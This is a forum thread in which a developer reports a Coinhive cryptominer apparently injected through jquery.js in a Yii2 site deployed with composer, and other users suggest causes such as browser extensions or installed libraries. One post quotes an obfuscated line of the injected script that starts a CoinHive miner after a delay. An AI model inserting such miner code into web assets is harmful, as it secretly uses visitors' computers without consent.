Coinhive cryptominer injected

Hi.

I’ve deployed yii2 app with composer some days ago. Yesterday I’ve found out that site contains coinhive cpyptominer script. Chrome says it was loaded by jquery.js.

UPD Btw I’m getting such error while using composer:

The “https://bower.herokuapp.com/packages/jquery” file could not be downloaded (HTTP/1.1 502 Bad Gateway)
https://bower.herokuapp.com/packages could not be fully loaded, package information was loaded from the local cache and may be out of date

@Woland

Hi Guy, you have screenshot from the code to view part injected script coinhive in Yii2 ?

Please upload screenshot and reply this post, Thx friend :slight_smile:

I’ve not found it in the code. Only seen result in the chrome debugger.

Take a screenshot from console debugger and reply this post please…

Specified line of jquery.js contains code
setTimeout(function(){var _0xc49cx4= new CoinHive.Anonymous(_0xe2c6[15]);_0xc49cx4_0xe2c6[16]},1500)

I installed Yii2 from Github and Composer and checking console debugger not found coinhive script

Check this screeshot Taken 5 minutes ago.

Have you any guesses what could it be? It’s not a browser virus: other sites don’t contain coinhive. It’s not a server problem: only yii2 sites have it. I’ve checked composer script but it’s not corrupted. I’ve done two setups of yii2 during last month and both have coinhive.

Yes, check your computer, search script extension from your navigator or in your HDD, well not problem with framework Yii2.

Regards from :venezuela:
Bye…

it could be some library you installed yourself, or it could also be a chrome extension